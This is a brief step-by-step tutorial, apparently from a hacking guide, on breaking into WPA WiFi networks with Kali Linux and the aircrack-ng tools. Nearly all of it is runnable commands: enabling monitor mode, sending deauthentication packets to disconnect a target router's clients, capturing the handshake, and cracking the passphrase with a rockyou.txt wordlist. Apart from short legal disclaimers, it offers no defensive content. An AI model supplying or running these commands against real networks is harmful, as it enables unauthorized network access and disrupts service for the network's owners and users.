WiFi Hacking in Kali Linux
Disclaimer: This guide is strictly for educational and ethical hacking purposes. Unauthorized access to networks is illegal.
Step-by-Step Process
1. Identify Available WiFi Networks
To find available WiFi networks in range, run the following command:
sudo iwlist wlan0 scan | grep ESSID
This command lists the networks in range and filters the output to show only their ESSIDs (WiFi network names).
2. Enable Monitor Mode
Before capturing packets, switch your WiFi adapter to monitor mode:
sudo airmon-ng start wlan0
This allows the adapter to capture all packets in the air, not just those meant for your device.
3. Capture WiFi Traffic
Once in monitor mode, capture network traffic and look for handshake packets:
sudo airodump-ng wlan0mon
This command shows available networks, their MAC addresses, and encryption types.
4. Deauthenticate Connected Devices
To force a client to reconnect (capturing the handshake), send deauth packets:
sudo aireplay-ng --deauth 5 -a <MAC_ADDRESS> wlan0mon
Replace <MAC_ADDRESS> with the target router's MAC address.
5. Capture the Handshake
Run airodump-ng again, specifying the target network to capture the handshake:
sudo airodump-ng -c <CHANNEL> --bssid <MAC_ADDRESS> -w handshake wlan0mon
Once a handshake is captured, you can attempt to crack it.
6. Crack the Captured Handshake
Use a dictionary attack to try breaking the WiFi password:
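sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <MAC_ADDRESS> handshake-01.cap
This command tries each entry in rockyou.txt (a common wordlist) as the passphrase against the captured handshake. airodump-ng appends -01 to the prefix given with -w, so the capture file is handshake-01.cap.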
Conclusion
Understanding how attackers target WiFi networks is crucial for protection.
Warning: This is for security research and educational purposes only. Unauthorized hacking is illegal.